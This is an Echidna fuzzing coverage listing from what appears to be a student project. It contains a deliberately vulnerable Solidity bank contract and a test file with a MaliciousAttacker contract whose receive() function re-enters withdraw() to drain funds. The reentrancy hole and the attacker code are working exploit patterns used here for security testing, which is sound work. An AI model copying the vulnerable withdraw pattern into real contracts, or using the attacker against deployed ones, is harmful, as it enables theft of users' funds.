/home/ali/TFG/pruebas-echidna/contracts/VulnerableBank.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 |     | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 |     |     function deposit() public payable {
  8 |     |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 |     |     function withdraw() public {
 12 |     |         uint256 balance = balances[msg.sender];
 13 |     |         require(balance > 0, "Insufficient balance");
 14 |     | 
 15 |     |         // Enviar la cantidad retirada al llamador (vulnerable a reentrancy)
 16 |     |         (bool success, ) = msg.sender.call{value: balance}("");
 17 |     |         require(success, "Transfer failed");
 18 |     | 
 19 |     |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }

/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 |     | import "../contracts/VulnerableBank.sol";
  5 |     | 
  6 |     | contract MaliciousAttacker {
  7 |     |     VulnerableBank public bank;
  8 |     |     uint256 public stolen;
  9 |     | 
 10 |     |     constructor(address _target) {
 11 |     |         bank = VulnerableBank(_target);
 12 |     |     }
 13 |     | 
 14 |     |     function deposit() external payable {
 15 |     |         bank.deposit{value: msg.value}();
 16 |     |     }
 17 |     | 
 18 |     |     function attack() external {
 19 |     |         bank.withdraw();
 20 |     |     }
 21 |     | 
 22 |     |     receive() external payable {
 23 |     |         stolen += msg.value;
 24 |     |         // ✅ Condición más permisiva para múltiples reentradas
 25 |     |         if (address(bank).balance > 0 && stolen < 1000) {
 26 |     |             bank.withdraw();
 27 |     |         }
 28 |     |     }
 29 |     | }
 30 |     | 
 31 | *r  | contract ReentrancyEchidnaTest {
 32 |     |     constructor() payable {}
 33 |     | 
 34 |     |     // ✅ Test 1: Banco NO debe quedar vacío
 35 |     |     function echidna_bank_not_drained() public payable returns (bool) {
 36 |     |         if (msg.value == 0) return true;
 37 |     |         
 38 |     |         VulnerableBank bank = new VulnerableBank();
 39 |     |         MaliciousAttacker attacker = new MaliciousAttacker(address(bank));
 40 |     |         
 41 |     |         bank.deposit{value: 1000}();    // ✅ 1000 wei
 42 |     |         attacker.deposit{value: 500}(); // ✅ 500 wei
 43 |     |         
 44 |     |         attacker.attack();
 45 |     |         
 46 |     |         return address(bank).balance > 0;
 47 |     |     }
 48 |     |     
 49 |     |     // ✅ Test 2: Attacker NO debe robar todo
 50 |     |     function echidna_attacker_cannot_steal_all() public payable returns (bool) {
 51 |     |         if (msg.value == 0) return true;
 52 |     |         
 53 |     |         VulnerableBank bank = new VulnerableBank();
 54 |     |         MaliciousAttacker attacker = new MaliciousAttacker(address(bank));
 55 |     |         
 56 |     |         bank.deposit{value: 1000}();
 57 |     |         uint256 deposit = 500;
 58 |     |         attacker.deposit{value: deposit}();
 59 |     |         
 60 |     |         attacker.attack();
 61 |     |         
 62 |     |         return attacker.stolen() <= deposit;
 63 |     |     }
 64 |     |     
 65 |     |     // ✅ Test 3: Invariante de balance
 66 |     |     function echidna_bank_balance_invariant() public payable returns (bool) {
 67 |     |         if (msg.value == 0) return true;
 68 |     |         
 69 |     |         VulnerableBank bank = new VulnerableBank();
 70 |     |         uint256 initialBalance = address(bank).balance;
 71 |     |         
 72 |     |         bank.deposit{value: 1000}();
 73 |     |         MaliciousAttacker attacker = new MaliciousAttacker(address(bank));
 74 |     |         attacker.deposit{value: 500}();
 75 |     |         attacker.attack();
 76 |     |         
 77 |     |         return address(bank).balance < initialBalance;
 78 |     |     }
 79 |     | }

